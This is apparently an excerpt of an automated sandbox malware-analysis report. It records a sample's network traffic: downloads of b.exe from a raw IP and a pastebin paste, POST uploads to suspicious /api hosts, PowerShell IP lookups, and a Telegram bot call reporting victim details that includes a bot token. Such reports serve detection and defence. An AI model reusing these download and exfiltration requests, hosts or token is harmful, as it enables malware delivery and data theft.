00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 11:47:16 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 22 Nov 2024 15:53:53 GMTETag: "af000-6278263cd54f1"Accept-Ranges: bytesContent-Length: 716800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 08 00 00 00 00 00 00 00 00 00 00 00 00 20 09 00 48 00 00 00 00 00 00 00 00 00 00 00 6d 09 40 19 6b 07 61 16 5c ef 08 00 00 20 00 00 00 f0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 80 ef 01 00 00 20 09 00 00 f0 01 00 00 f4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 06 00 00 00 20 0b 00 00 08 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 ec 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 60 0b 00 00 02 00 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
                      Source: global trafficHTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: ipinfo.io
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49734 -> 192.81.132.76:80
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49735 -> 192.81.132.76:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.184.174:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.20.3.235:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 104.20.3.235:443
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F7T7SFWO3V8ZTN3AJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E4SXMRUR15VLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F0AWCPRRPW8BEIFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86OMU50YVUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PB87JFRCI72DMDXKZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1139Host: frogs-severz.sbs
                      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.81.132.76
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
                      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: revirepart.biz
                      Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
                      Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
                      Source: powershell.exe, 00000011.00000002.1887480681.0000000005472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.132.76
                      Source: powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.132.76/b.exe
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: powershell.exe, 0000000F.00000002.1784830664.0000000007082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                      Source: powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro/
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: powershell.exe, 00000022.00000002.2258625366.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.000000000532D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                      Source: powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: powershell.exe, 00000011.00000002.1887480681.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000008.00000002.1754027788.0000000007C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co1
                      Source: powershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cou
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
                      Source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2604425013.0000000007490000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000B.00000002.1743928726.00000000056B1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1743019930.0000000007391000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742462510.00000000056B0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742259458.00000000056AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: rundll32.exe, 0000000A.00000002.2603536788.0000000005070000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2601043112.0000000003355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
